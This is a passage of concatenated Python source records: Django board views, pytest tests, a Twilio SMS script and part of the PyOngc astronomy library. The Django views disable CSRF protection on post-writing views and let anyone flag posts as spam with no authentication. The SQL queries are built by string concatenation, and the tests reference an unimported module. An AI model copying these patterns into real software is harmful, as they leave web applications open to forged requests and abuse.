main()\r\n","sub_path":"catch_the_monster.py","file_name":"catch_the_monster.py","file_ext":"py","file_size_in_byte":9244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"91499868","text":"from django.shortcuts import render\nfrom django.http.response import HttpResponse, HttpResponseRedirect\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom django.contrib.auth.models import User\nfrom board.models import Recruit, Apply, Collected\nfrom ad.models import Ads\nfrom board.forms import RecruitWriteForm, ApplyWriteForm\n\n\ndef index(request):\n\tcontext = {}\n\treturn render(request, 'index.html', context)\n\ndef naver_search(request):\n\treturn render(request, 'naver_search.html', {})\n\ndef make_page_range(current,total_page):\n\trange_index=divmod(current-1,10)[0]\n\tpage_range = range((range_index)*10+1, (range_index+1)*10+1)\n\tpage_previous = range_index*10\n\tpage_next = (range_index+1)*10+1\n\tif((range_index+1)*10>total_page):\n\t\tpage_range = range((range_index)*10+1,total_page)\n\t\tpage_next = 0\n\tif(range_index == 0):\n\t\tpage_previous = 0\n\treturn [page_range,page_previous,page_next]\n\ndef recruit(request):\n\tposts = Recruit.objects.all()\n\t#페이지 확인\t\n\tpage_data = Paginator(Recruit.objects.all().order_by('-id'),20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tposts = page_data.page(page)\n\texcept PageNotAnInteger:\n\t\tposts = page_data.page(1)\n\t\tpage = 1\n\texcept EmptyPage:\n\t\tposts = page_data.page(page_data.num_pages)\n\t#페이지네이션\n\tpage = int(page)\n\tmake_page_range_result = make_page_range(page,page_data.num_pages+1)\n\tboard_range = make_page_range_result[0]\n\tpage_previous = make_page_range_result[1]\n\tpage_next = make_page_range_result[2]\n\tcontext={\n\t\t'posts':posts,\n\t\t'page_previous':page_previous,\n\t\t'page':page,\n\t\t'page_next':page_next,\n\t\t'board_range':board_range}\n\treturn render(request, 'board/recruit.html', context)\n\ndef recruit_post_read(request):\n\trecruit_post_id = request.GET.get('recruit_post_id')\n\tif recruit_post_id:\n\t\tpost = Recruit.objects.get(id = recruit_post_id)\n\t\tcontext={'post':post}\n\t\treturn render(request,'board/recruit_post_read.html', context)\n\telse:\n\t\treturn HttpResponseRedirect('/board/recruit')\n\n@csrf_exempt\ndef recruit_post_write(request):\n\tif request.method == 'POST':\n\t\tform = RecruitWriteForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnew = Recruit(title=form.cleaned_data['title'], content=form.cleaned_data['content'], author=request.user)\n\t\t\tnew.save()\n\t\t\tpost = Recruit.objects.get(id = new.id)\n\t\t\tcontext={'post':post}\n\t\t\treturn render(request,'board/recruit_post_read.html', context)\n\telse:\n\t\ttemplate = get_template('board/recruit_post_write.html')\n\t\tform = RecruitWriteForm()\n\t\tcontext={'form':form}\n\t\treturn render(request,'board/recruit_post_write.html', context)\n\ndef apply(request):\n\tposts = Apply.objects.all()\n\t#페이지 확인\t\n\tpage_data = Paginator(Apply.objects.all().order_by('-id'),20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tposts = page_data.page(page)\n\texcept PageNotAnInteger:\n\t\tposts = page_data.page(1)\n\t\tpage = 1\n\texcept EmptyPage:\n\t\tposts = page_data.page(page_data.num_pages)\n\t#페이지네이션\n\tpage = int(page)\n\tmake_page_range_result = make_page_range(page,page_data.num_pages+1)\n\tboard_range = make_page_range_result[0]\n\tpage_previous = make_page_range_result[1]\n\tpage_next = 
make_page_range_result[2]\n\tcontext={\n\t\t'posts':posts,\n\t\t'page_previous':page_previous,\n\t\t'page':page,\n\t\t'page_next':page_next,\n\t\t'board_range':board_range}\n\treturn render(request, 'board/apply.html', context)\n\ndef apply_post_read(request):\n\tapply_post_id = request.GET.get('apply_post_id')\n\tif apply_post_id:\n\t\tpost = Apply.objects.get(id = apply_post_id)\n\t\tcontext={'post':post}\n\t\treturn render(request, 'board/apply_post_read.html', context)\n\telse:\n\t\treturn HttpResponseRedirect('/board/apply')\n\n@csrf_exempt\ndef apply_post_write(request):\n\tif request.method == 'POST':\n\t\tform = ApplyWriteForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnew = Apply(title=form.cleaned_data['title'], content=form.cleaned_data['content'], author=request.user)\n\t\t\tnew.save()\n\t\t\tpost = Apply.objects.get(id = new.id)\n\t\t\tcontext={'post':post}\n\t\t\treturn render(request, 'board/apply_post_read.html', context)\n\telse:\n\t\ttemplate = get_template('board/apply_post_write.html')\n\t\tform = ApplyWriteForm()\n\t\tcontext={'form':form}\n\t\treturn render(request, 'board/apply_post_write.html', context)\n\ndef collected(request):\n\ts=request.META.get('HTTP_USER_AGENT', '')\n\tprint(s)\n\tprint(s.find('waxingmodel_app'))\n\tposts = Collected.objects.all()\n\t#페이지 확인\t\n\tpage_data = Paginator(Collected.objects.all().exclude(is_spam=True).order_by('-id'),20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tposts = page_data.page(page)\n\texcept PageNotAnInteger:\n\t\tposts = page_data.page(1)\n\t\tpage = 1\n\texcept EmptyPage:\n\t\tposts = page_data.page(page_data.num_pages)\n\t#페이지네이션\n\tpage = int(page)\n\tmake_page_range_result = make_page_range(page,page_data.num_pages+1)\n\tboard_range = make_page_range_result[0]\n\tpage_previous = make_page_range_result[1]\n\tpage_next = make_page_range_result[2]\n\tcontext={\n\t\t'posts':posts,\n\t\t'page_previous':page_previous,\n\t\t'page':page,\n\t\t'page_next':page_next,\n\t\t'board_range':board_range}\n\treturn render(request, 'board/collected.html', context)\n\ndef collected_post_read(request):\n\tcollected_post_id = request.GET.get('collected_post_id')\n\tif collected_post_id:\n\t\tpost = Collected.objects.get(id = collected_post_id)\n\t\tif post.is_spam:\n\t\t\tpost.content = '스팸처리된 게시글입니다.'\n\t\tcontext={'post':post}\n\t\treturn render(request, 'board/collected_post_read.html', context)\n\telse:\n\t\treturn HttpResponseRedirect('/board/collected')\n\ndef collected_make_spam(request):\n\tcollected_id = request.GET.get('collected_id')\n\tspam_target = Collected.objects.get(id=collected_id)\n\tspam_target.is_spam = True\n\tspam_target.save()\n#\toriginal_url = request.GET.get('original_url')\n#\treturn render(request, 'board/collected_post_read.html', context)\n\treturn HttpResponseRedirect(request.META.get('HTTP_REFERER'))","sub_path":"waxingmodel/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"287087126","text":"from solution import collect_places\nfrom io import StringIO\nimport sys\n\nempty_place_inputs = StringIO(\"\\n\")\none_place_input = StringIO(\"London, England\\n\\n\")\nmany_place_inputs = StringIO(\n \"\"\"Shanghai, China\nBeijing, China\nTel Aviv, Israel\nHaifa, Israel\nMadrid, Spain\nBarcelona, Spain\n\n\"\"\"\n)\n\n\ndef test_no_places(monkeypatch):\n monkeypatch.setattr(\"sys.stdin\", empty_place_inputs)\n collect_places()\n assert len(solution.visits) == 0\n\n\ndef test_one_place(monkeypatch):\n monkeypatch.setattr('sys.stdin', one_place_input)\n solution.collect_places()\n assert len(solution.visits) == 1\n\ndef test_many_places(monkeypatch):\n monkeypatch.setattr('sys.stdin', many_place_inputs)\n solution.collect_places()\n assert len(solution.visits) == 3\n\ndef test_invalid_input(monkeypatch, capsys):\n monkeypatch.setattr('sys.stdin', StringIO('abcd\\n\\n'))\n solution.collect_places()\n captured_out, captured_err = capsys.readouterr()\n assert captured_out.strip().startswith(\"Tell me where you went: That's not a legal city, country combination\")\n assert captured_out.strip().endswith(\"Tell me where you went:\")\n\ndef test_sorting_cities(monkeypatch, capsys):\n monkeypatch.setattr('sys.stdin', StringIO('Shanghai, China\\nBeijing, China\\nBeijing, China\\n\\n'))\n solution.collect_places()\n captured_out, captured_err = capsys.readouterr()\n\n solution.display_places()\n captured_out, captured_err = capsys.readouterr()\n beijing_index = captured_out.index('Beijing')\n shanghai_index = captured_out.index('Shanghai')\n assert beijing_index < shanghai_index\n\ndef test_sorting_countries(monkeypatch, capsys):\n monkeypatch.setattr('sys.stdin', StringIO('Haifa, Israel\\nLondon, England\\nNew York, USA\\n\\n'))\n solution.collect_places()\n captured_out, captured_err = capsys.readouterr()\n\n solution.display_places()\n captured_out, captured_err = capsys.readouterr()\n israel_index = captured_out.index('Israel')\n england_index = captured_out.index('England')\n usa_index = captured_out.index('USA')\n assert england_index < israel_index\n assert israel_index < usa_index\n\n\ndef test_counting(monkeypatch, capsys):\n monkeypatch.setattr('sys.stdin', StringIO('Shanghai, China\\nBeijing, China\\nBeijing, China\\n\\n'))\n solution.collect_places()\n captured_out, captured_err = capsys.readouterr()\n assert len(solution.visits['China']) == 2\n\n solution.display_places()\n captured_out, captured_err = capsys.readouterr()\n assert 'Beijing (2)' in captured_out\n assert 'Shanghai' in captured_out\n","sub_path":"reuven_lerner_problems/oop/week_1/test_solution.py","file_name":"test_solution.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"33131800","text":"# Download the helper library from https://www.twilio.com/docs/python/install\nfrom twilio.rest import Client\nfrom settings import Keys\n\n\n# Your Account Sid and Auth Token from twilio.com/console\naccount_sid = Keys.TWILIO_ACCOUNT_SID\nauth_token = Keys.TWILIO_AUTH_TOKEN\nclient = Client(account_sid, auth_token)\n\nmessage = client.messages \\\n .create(\n body=\"mauricio is awesome\",\n from_=Keys.TWILIO_SEND_PHONE_NUM,\n to=Keys.TWILIO_REC_PHONE_NUM,\n )\n\nprint(message.sid)\n","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
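The script above imports credentials from a local settings module that is not part of this record; a minimal sketch that reads them from environment variables instead of hard-coding them (attribute names follow the usage above):

```python
# settings.py sketch (assumed): pull Twilio credentials from the environment.
import os

class Keys:
    TWILIO_ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
    TWILIO_AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
    TWILIO_SEND_PHONE_NUM = os.environ['TWILIO_SEND_PHONE_NUM']  # E.164, e.g. '+15551234567'
    TWILIO_REC_PHONE_NUM = os.environ['TWILIO_REC_PHONE_NUM']
```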
+{"seq_id":"534141794","text":"# -*- coding:utf-8 -*-\n#\n# MIT License\n#\n# Copyright (c) 2017 Mattia Verga \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n\"\"\"Provides classes and functions to access OpenNGC database.\n\nClasses provided:\n * Dso: the main class which describe a single row (object) from OpenNGC database.\n\nMethods provided:\n * getNeighbors: Find all neighbors of a object within a user selected range.\n * getSeparation: Calculate the apparent angular separation between two objects.\n * listObjects: Query DB for DSObjects with specific parameters.\n * printDetails: Prints a detailed description of the object in a formatted output.\n * searchAltId: Search a object in the database using an alternative identifier.\n\"\"\"\n\nfrom pkg_resources import resource_filename\nimport numpy as np\nimport re\nimport sqlite3\n\n__version__ = '0.3.1'\nDBDATE = 20190303 # Version of database data\nDBPATH = resource_filename(__name__, 'ongc.db')\n\n\nclass Dso(object):\n \"\"\"Defines a single Deep Sky Object from ONGC database.\n\n A DSO object represents a single row from OpenNGC database, which corresponds to\n a Deep Sky Object from NGC or IC catalogs.\n\n The class provides the following methods to access object data:\n * __init__: Object constructor.\n * __str__: Returns basic data of the object as a formatted string.\n * getConstellation: Returns the constellation where the object is located.\n * getCoords: Returns the coordinates of the object in J2000 Epoch as numpy array.\n * getCStarData: Returns data about central star of planetary nebulaes.\n * getDec: Returns the Declination in J2000 Epoch in string format.\n * getDimensions: Returns object axes dimensions and position angle.\n * getHubble: Returns the Hubble classification of the galaxy.\n * getId: Returns the database Id of the object.\n * getIdentifiers: Returns the alternative identifiers of the object.\n * getMagnitudes: Returns the magnitudes of the object.\n * getName: Returns the main identifier of the object.\n * getNotes: Returns notes from NED and from ONGC author.\n * getSurfaceBrightness: Returns the surface brightness value of the galaxy.\n * getType: Returns the type of the object.\n * getRA: Returns the Right Ascension in J2000 Epoch in string format.\n * xephemFormat: Returns object data in Xephem format.\n \"\"\"\n\n def __init__(self, name, returndup=False):\n \"\"\"Object constructor.\n\n :param string name: identifier of the NGC or IC object\n :optional param returndup: if True 
don't resolve Dup objects\n \"\"\"\n # Make sure user passed a string as parameter\n if not isinstance(name, str):\n raise TypeError('Wrong type as parameter. A string type was expected.')\n\n # Make sure object name is written in correct form\n nameParts = re.match(r'^((?:NGC|IC)\\s?)(\\d{1,4})\\s?((NED)(\\d{1,2})|[A-Z]{1,2})?$',\n name.upper())\n if nameParts is None:\n raise ValueError('Wrong object name. Please insert a valid NGC or IC object name.')\n\n if nameParts.group(3) is not None:\n # User searches for a sub-object\n if nameParts.group(4) is not None:\n # User searches for a NED suffixed component\n objectname = (nameParts.group(1).strip()\n + '{:0>4}'.format(nameParts.group(2))\n + ' '\n + nameParts.group(4)\n + '{:0>2}'.format(nameParts.group(5))\n )\n else:\n # User searches a letter suffixed component\n objectname = (nameParts.group(1).strip()\n + '{:0>4}'.format(nameParts.group(2))\n + nameParts.group(3).strip()\n )\n else:\n objectname = (nameParts.group(1).strip()\n + '{:0>4}'.format(nameParts.group(2))\n )\n\n cols = ('objects.id, objects.type, objTypes.typedesc, ra, dec, const, majax, minax, '\n 'pa, bmag, vmag, jmag,hmag, kmag, sbrightn, hubble, cstarumag, cstarbmag, '\n 'cstarvmag, messier, ngc, ic, cstarnames,identifiers, commonnames, nednotes, '\n 'ongcnotes')\n tables = 'objects JOIN objTypes ON objects.type = objTypes.type'\n params = 'name=\"' + objectname + '\"'\n objectData = _queryFetchOne(cols, tables, params)\n\n if objectData is None:\n raise ValueError('Object named ' + objectname + ' not found in the database.')\n\n # If object is a duplicate then return the main object\n if objectData[1] == \"Dup\" and not returndup:\n if objectData[20] != \"\":\n objectname = \"NGC\" + str(objectData[20])\n else:\n objectname = \"IC\" + str(objectData[21])\n params = 'name=\"' + objectname + '\"'\n objectData = _queryFetchOne(cols, tables, params)\n\n # Assign object properties\n self._id = objectData[0]\n self._name = objectname\n self._type = objectData[2]\n\n # R.A. can be empty for NonEx objects only\n if self._type == \"Nonexistent object\" and objectData[3] == \"\":\n self._ra = None\n else:\n try:\n self._ra = np.array([float(x) for x in objectData[3].split(':')])\n except Exception:\n raise ValueError('There must be some error in the database: '\n + 'I can\\'t recognize R.A. 
data of object '\n + self._name)\n\n # Declination can be empty for NonEx objects only\n if self._type == \"Nonexistent object\" and objectData[4] == \"\":\n self._dec = None\n else:\n try:\n self._dec = np.array([float(x) for x in objectData[4].split(':')])\n except Exception:\n raise ValueError('There must be some error in the database: '\n + 'I can\\'t recognize Declination data of object '\n + self._name)\n\n self._const = objectData[5]\n\n # These properties may be empty\n self._majax = objectData[6]\n self._minax = objectData[7]\n self._pa = objectData[8]\n self._bmag = objectData[9]\n self._vmag = objectData[10]\n self._jmag = objectData[11]\n self._hmag = objectData[12]\n self._kmag = objectData[13]\n self._sbrightn = objectData[14]\n self._hubble = objectData[15]\n self._cstarumag = objectData[16]\n self._cstarbmag = objectData[17]\n self._cstarvmag = objectData[18]\n self._messier = objectData[19]\n self._ngc = objectData[20]\n self._ic = objectData[21]\n self._cstarnames = objectData[22]\n self._identifiers = objectData[23]\n self._commonnames = objectData[24]\n self._nednotes = objectData[25]\n self._ongcnotes = objectData[26]\n\n def __str__(self):\n \"\"\"Returns basic data of the object.\n\n >>> s = Dso(\"ngc1\")\n >>> print(s)\n NGC0001, Galaxy in Peg\n\n \"\"\"\n return (self._name + \", \" + self._type + \" in \" + self._const)\n\n def getConstellation(self):\n \"\"\"Returns the constellation where the object is located.\n\n :returns: 'constellation'\n\n >>> s = Dso(\"ngc1\")\n >>> s.getConstellation()\n 'Peg'\n\n \"\"\"\n return self._const\n\n def getCoords(self):\n \"\"\"Returns the coordinates of the object in J2000 Epoch as numpy array.\n\n :returns: array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n\n >>> s = Dso(\"ngc1\")\n >>> s.getCoords()\n array([[ 0. , 7. , 15.84],\n [27. , 42. 
, 29.1 ]])\n\n \"\"\"\n if self._ra is None or self._dec is None:\n raise ValueError('Object named ' + self._name + ' has no coordinates in database.')\n return np.array([self._ra, self._dec, ])\n\n def getCStarData(self):\n \"\"\"Returns data about central star of planetary nebulaes.\n\n :returns: ([cstar identifiers], cstar UMag, cstar BMag, cstar VMag)\n\n If the DSO object is a Planetary Nebulae, this method will return a tuple with\n the central star identifiers and its magnitudes in U-B-V bands:\n\n >>> s = Dso(\"ngc1535\")\n >>> s.getCStarData()\n (['BD -13 842', 'HD 26847'], None, 12.19, 12.18)\n\n If the object is not a PN it returns all None values:\n\n >>> s = Dso(\"ngc1\")\n >>> s.getCStarData()\n (None, None, None, None)\n\n \"\"\"\n if self._cstarnames != \"\":\n identifiers = list(map(str.strip, self._cstarnames.split(\",\")))\n else:\n identifiers = None\n\n return identifiers, self._cstarumag, self._cstarbmag, self._cstarvmag\n\n def getDec(self):\n \"\"\"Returns the Declination in J2000 Epoch in string format.\n\n :returns: '+/-DD:MM:SS.s'\n\n If you need the raw data use getCoords() method.\n\n >>> s = Dso(\"ngc1\")\n >>> s.getDec()\n '+27:42:29.1'\n\n >>> s = Dso(\"ngc6991\")\n >>> s.getDec()\n 'N/A'\n\n \"\"\"\n if self._dec is not None:\n return '{:+03.0f}:{:02.0f}:{:04.1f}'.format(*self._dec)\n else:\n return 'N/A'\n\n def getDimensions(self):\n \"\"\"Returns a tuple with object axes dimensions (float) and position angle (int).\n\n :returns: (MajAx, MinAx, P.A.)\n\n Where values are not available a None type is returned.\n\n >>> s = Dso(\"ngc1\")\n >>> s.getDimensions()\n (1.57, 1.07, 112)\n\n \"\"\"\n return self._majax, self._minax, self._pa\n\n def getHubble(self):\n \"\"\"Returns the Hubble classification of the object.\n\n :returns: string\n\n >>> s = Dso(\"ngc1\")\n >>> s.getHubble()\n 'Sb'\n\n \"\"\"\n return self._hubble\n\n def getId(self):\n \"\"\"Returns the database Id of the object.\n\n :returns: int\n\n >>> s = Dso(\"ngc1\")\n >>> s.getId()\n 5612\n\n \"\"\"\n return self._id\n\n def getIdentifiers(self):\n \"\"\"Returns a tuple of alternative identifiers of the object.\n\n :returns: ('Messier', [NGC], [IC], [common names], [other])\n\n If a field is empty a None type is returned:\n\n >>> s = Dso(\"ngc1\")\n >>> s.getIdentifiers()\n (None, None, None, None, ['2MASX J00071582+2742291', 'IRAS 00047+2725', \\\n'MCG +04-01-025', 'PGC 000564', 'UGC 00057'])\n\n \"\"\"\n if self._messier == \"\":\n messier = None\n else:\n messier = \"M\" + self._messier\n\n if self._ngc == \"\":\n ngc = None\n else:\n ngc = list(map(str.strip, self._ngc.split(\",\")))\n ngc = list(map(lambda number: \"NGC\" + number, ngc))\n\n if self._ic == \"\":\n ic = None\n else:\n ic = list(map(str.strip, self._ic.split(\",\")))\n ic = list(map(lambda number: \"IC\" + number, ic))\n\n if self._commonnames == \"\":\n commonNames = None\n else:\n commonNames = list(map(str.strip, self._commonnames.split(\",\")))\n\n if self._identifiers == \"\":\n other = None\n else:\n other = list(map(str.strip, self._identifiers.split(\",\")))\n\n return messier, ngc, ic, commonNames, other\n\n def getMagnitudes(self):\n \"\"\"Returns the magnitudes of the object as a tuple of floats.\n\n :returns: (Bmag, Vmag, Jmag, Hmag, Kmag)\n\n Where values are not available a None type is returned:\n\n >>> s = Dso(\"ngc1\")\n >>> s.getMagnitudes()\n (13.4, None, 10.78, 10.02, 9.76)\n\n \"\"\"\n return self._bmag, self._vmag, self._jmag, self._hmag, self._kmag\n\n def getName(self):\n \"\"\"Returns the main 
identifier of the object.\n\n        :returns: string\n\n        >>> s = Dso(\"ngc1\")\n        >>> s.getName()\n        'NGC0001'\n\n        \"\"\"\n        return self._name\n\n    def getNotes(self):\n        \"\"\"Returns notes from NED and from ONGC author.\n\n        :returns: ('nednotes', 'ongcnotes')\n\n        >>> s = Dso(\"ngc6543\")\n        >>> s.getNotes()\n        ('Additional radio sources may contribute to the WMAP flux.', \\\n'Dimensions taken from LEDA')\n\n        \"\"\"\n        return self._nednotes, self._ongcnotes\n\n    def getSurfaceBrightness(self):\n        \"\"\"Returns the surface brightness value of the object.\n\n        :returns: float or None\n\n        >>> s = Dso(\"ngc1\")\n        >>> s.getSurfaceBrightness()\n        23.13\n\n        \"\"\"\n        return self._sbrightn\n\n    def getType(self):\n        \"\"\"Returns the type of the object.\n\n        :returns: string\n\n        >>> s = Dso(\"ngc1\")\n        >>> s.getType()\n        'Galaxy'\n\n        \"\"\"\n        return self._type\n\n    def getRA(self):\n        \"\"\"Returns the Right Ascension in J2000 Epoch in string format.\n\n        :returns: 'HH:MM:SS.ss'\n\n        If you need the raw data use getCoords() method.\n\n        >>> s = Dso(\"ngc1\")\n        >>> s.getRA()\n        '00:07:15.84'\n\n        >>> s = Dso(\"ngc6991\")\n        >>> s.getRA()\n        'N/A'\n\n        \"\"\"\n        if self._ra is not None:\n            return '{:02.0f}:{:02.0f}:{:05.2f}'.format(*self._ra)\n        else:\n            return 'N/A'\n\n    def xephemFormat(self):\n        \"\"\"Returns object data in Xephem format.\n\n        :returns: string\n\n        This function will produce a string containing information about the object\n        suitable to be imported in other software that accept Xephem format\n        (for example: PyEphem).\n\n        >>> s = Dso(\"ngc1\")\n        >>> s.xephemFormat()\n        'NGC0001,f|G,00:07:15.84,+27:42:29.1,13.4,,94.2|64.2|112'\n\n        \"\"\"\n        line = []\n        # Field 1: names\n        names = [self.getName()]\n        identifiers = self.getIdentifiers()\n        if identifiers[0] is not None:\n            names.append(identifiers[0])\n        for i in range(1, 4):\n            if identifiers[i] is not None:\n                names.extend(identifiers[i])\n        line.append(\"|\".join(names))\n\n        # Field 2: type designation\n        objType = self.getType()\n        if objType in (\"Galaxy Pair\", \"Galaxy Triplet\", \"Group of galaxies\"):\n            line.append(\"f|A\")\n        elif objType == \"Globular Cluster\":\n            line.append(\"f|C\")\n        elif objType == \"Double star\":\n            line.append(\"f|D\")\n        elif objType in (\"HII Ionized region\", \"Nebula\"):\n            line.append(\"f|F\")\n        elif objType == \"Galaxy\":\n            if self.getHubble().startswith(\"S\"):\n                line.append(\"f|G\")\n            else:\n                line.append(\"f|H\")\n        elif objType == \"Dark Nebula\":\n            line.append(\"f|K\")\n        elif objType in (\"Emission Nebula\", \"Reflection Nebula\"):\n            line.append(\"f|N\")\n        elif objType in (\"Association of stars\", \"Open Cluster\"):\n            line.append(\"f|O\")\n        elif objType == \"Planetary Nebula\":\n            line.append(\"f|P\")\n        elif objType == \"Supernova remnant\":\n            line.append(\"f|R\")\n        elif objType == \"Star\":\n            line.append(\"f|S\")\n        elif objType == \"Star cluster + Nebula\":\n            line.append(\"f|U\")\n        else:\n            line.append(\"f\")\n\n        # Field 3: Right Ascension\n        line.append(self.getRA())\n\n        # Field 4: Declination\n        line.append(self.getDec())\n\n        # Field 5: Magnitude\n        # We use the first available magnitude in the sequence b,v,j,h,k\n        for mag in self.getMagnitudes():\n            if mag is not None:\n                line.append(str(mag))\n                break\n\n        # Field 6: optional Epoch, we leave it empty\n        line.append(\"\")\n\n        # Field 7: Dimensions\n        dimensions = []\n        # Xephem format wants axes expressed in arcsec, we have arcmin\n        for value in (self.getDimensions()[0], self.getDimensions()[1]):\n            if value is not None:\n                dimensions.append(str(value*60))\n            else:\n                dimensions.append(\"\")\n        # position angle, in degrees\n        if self.getDimensions()[2] is not None:\n            dimensions.append(str(self.getDimensions()[2]))\n        else:\n            dimensions.append(\"\")\n        line.append(\"|\".join(dimensions))\n\n        return \",\".join(line)\n\n\ndef _distance(coords1, coords2):\n    \"\"\"Calculate distance between two points in the sky.\n\n    :param coords1: A.R. and Dec of the first point as numpy array\n        array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n    :param coords2: A.R. and Dec of the second point as numpy array\n        array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n    :returns: (float: angular separation, float: difference in A.R., float: difference in Dec)\n    \"\"\"\n    a1 = np.radians(np.sum(coords1[0] * [15, 1/4, 1/240]))\n    a2 = np.radians(np.sum(coords2[0] * [15, 1/4, 1/240]))\n    if np.signbit(coords1[1][0]):\n        d1 = np.radians(np.sum(coords1[1] * [1, -1/60, -1/3600]))\n    else:\n        d1 = np.radians(np.sum(coords1[1] * [1, 1/60, 1/3600]))\n    if np.signbit(coords2[1][0]):\n        d2 = np.radians(np.sum(coords2[1] * [1, -1/60, -1/3600]))\n    else:\n        d2 = np.radians(np.sum(coords2[1] * [1, 1/60, 1/3600]))\n\n    # separation = np.arccos(np.sin(d1)*np.sin(d2) + np.cos(d1)*np.cos(d2)*np.cos(a1-a2))\n    # Better precision formula\n    # see http://aa.quae.nl/en/reken/afstanden.html\n    separation = 2*np.arcsin(np.sqrt(np.sin((d2-d1)/2)**2 +\n                                     np.cos(d1)*np.cos(d2)*np.sin((a2-a1)/2)**2))\n\n    return np.degrees(separation), np.degrees(a2-a1), np.degrees(d2-d1)\n\n\ndef _limiting_coords(coords, radius):\n    \"\"\"Write query filters for limiting search to specific area of the sky.\n\n    :param coords: A.R. and Dec of the point in the sky\n        array([[HH., MM., SS.ss],[DD., MM., SS.ss]])\n    :param int radius: radius in degrees\n    :returns string: parameters to be added to query\n\n    This is a quick method to exclude objects farther than a specified distance\n    from the starting point, but it's not meant to be precise.\n    \"\"\"\n    ra_lower_limit_deg = np.sum(coords[0] * [15, 1/4, 1/240]) - radius\n    if ra_lower_limit_deg < 0:\n        ra_lower_limit_deg += 360\n    ra_lower_limit_hour = np.floor_divide(ra_lower_limit_deg, 15)\n    ra_upper_limit_deg = np.sum(coords[0] * [15, 1/4, 1/240]) + radius\n    if ra_upper_limit_deg > 360:\n        ra_upper_limit_deg -= 360\n    ra_upper_limit_hour = np.floor_divide(ra_upper_limit_deg, 15)\n    if coords[0][0] == ra_lower_limit_hour or coords[0][0] == ra_upper_limit_hour:\n        params = (' AND (ra LIKE \"{:02.0f}:%\"'\n                  ' OR ra LIKE \"{:02.0f}:%\")'.format(ra_lower_limit_hour,\n                                                     ra_upper_limit_hour))\n    else:\n        params = (' AND (ra LIKE \"{:02.0f}:%\"'\n                  ' OR ra LIKE \"{:02.0f}:%\"'\n                  ' OR ra LIKE \"{:02.0f}:%\")'.format(ra_lower_limit_hour,\n                                                     coords[0][0],\n                                                     ra_upper_limit_hour))\n\n    if np.signbit(coords[1][0]):\n        dec_lower_limit = np.sum(coords[1] * [1, -1/60, -1/3600]) - radius\n        dec_upper_limit = np.sum(coords[1] * [1, -1/60, -1/3600]) + radius\n    else:\n        dec_lower_limit = np.sum(coords[1] * [1, 1/60, 1/3600]) - radius\n        dec_upper_limit = np.sum(coords[1] * [1, 1/60, 1/3600]) + radius\n    dec_lower_limit_str = '{:+03.0f}'.format(np.trunc(dec_lower_limit))\n    dec_upper_limit_str = '{:+03.0f}'.format(np.trunc(dec_upper_limit))\n    obj_limit_str = '{:+03.0f}'.format(coords[1][0])\n    params += (' AND (dec LIKE \"{}_:%\"'\n               ' OR dec LIKE \"{}_:%\"'\n               ' OR dec LIKE \"{}_:%\")'.format(dec_lower_limit_str[:2],\n                                              obj_limit_str[:2],\n                                              dec_upper_limit_str[:2]))\n    return params\n\n\ndef _queryFetchOne(cols, tables, params):\n    \"\"\"Search one row in database.\n\n    :param string cols: the SELECT field of the query\n    :param string tables: the FROM field of the query\n    :param string params: the WHERE field of the query\n    :returns: 
tuple with selected row data from database\n    \"\"\"\n    try:\n        db = sqlite3.connect('file:' + DBPATH + '?mode=ro', uri=True)\n    except sqlite3.Error:\n        raise OSError('There was a problem accessing database file at ' + DBPATH)\n\n    try:\n        cursor = db.cursor()\n        cursor.execute('SELECT ' + cols\n                       + ' FROM ' + tables\n                       + ' WHERE ' + params\n                       )\n        objectData = cursor.fetchone()\n    except Exception as err:\n        raise err\n    finally:\n        db.close()\n\n    return objectData\n\n\ndef _queryFetchMany(cols, tables, params):\n    \"\"\"Search many rows in database.\n\n    :param string cols: the SELECT field of the query\n    :param string tables: the FROM field of the query\n    :param string params: the WHERE field of the query\n    :returns: generator object yielding a tuple with selected row data from database\n    \"\"\"\n    try:\n        db = sqlite3.connect('file:' + DBPATH + '?mode=ro', uri=True)\n    except sqlite3.Error:\n        raise OSError('There was a problem accessing database file at ' + DBPATH)\n\n    try:\n        cursor = db.cursor()\n\n        cursor.execute('SELECT ' + cols\n                       + ' FROM ' + tables\n                       + ' WHERE ' + params\n                       )\n        while True:\n            objectList = cursor.fetchmany()\n            if objectList == []:\n                break\n            yield objectList[0]\n    except Exception as err:\n        raise err\n    finally:\n        